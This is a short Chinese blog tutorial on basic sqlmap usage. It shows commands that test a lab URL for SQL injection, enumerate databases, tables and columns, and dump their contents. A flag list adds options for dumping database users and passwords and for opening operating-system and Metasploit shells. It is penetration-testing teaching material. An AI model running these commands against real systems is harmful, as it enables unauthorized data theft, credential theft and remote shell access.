【教程】sqlmap基础用法

sqlmap基础用法


1.测试是否存在注入点,若无报错则存在注入

sqlmap -u "http://192.168.137.136/demo/sql.php?news=1" 

2.列出当前数据库

sqlmap -u "http://192.168.137.138/demo/sql.php?news=1" --current-db

3.指定数据库并列出所有表

sqlmap -u "http://192.168.137.138/demo/sql.php?news=1" -D test --tables 

4.指定数据表并列出字段

sqlmap -u "http://192.168.137.138/demo/sql.php?news=1" -D test -T news --columns

5.指定字段并列出字段内容

sqlmap -u "http://192.168.137.138/demo/sql.php?news=1" -D test -T news -C "id,news" --dump

更多用法

--dbs               //列出所有数据库
--current-db        //查看当前数据库
-D                  //选择数据库
--tables            //列出数据表
-T                  //选择数据表
--columns           //列出字段
-C                  //选择字段
--dump              //列出字段内容
--data=aaa          //提交post请求数据
--cookie=aaa        //指定cookie
-r aa.txt           //指定外部文件
--hostname          //列出主机名
--users             //列出所有数据库用户
--current-user      //列出当前数据库用户
--password          //列出当前数据库密码
--os-shell          //操作系统交互shell
--os-pwn            //msf交互shell


本博客所有文章如无特别注明均为原创。作者:KING复制或转载请以超链接形式注明转自 千世博客
原文地址《【教程】sqlmap基础用法
分享到:更多

相关推荐

发表评论

路人甲 表情
看不清楚?点图切换 Ctrl+Enter快速提交

网友评论(0)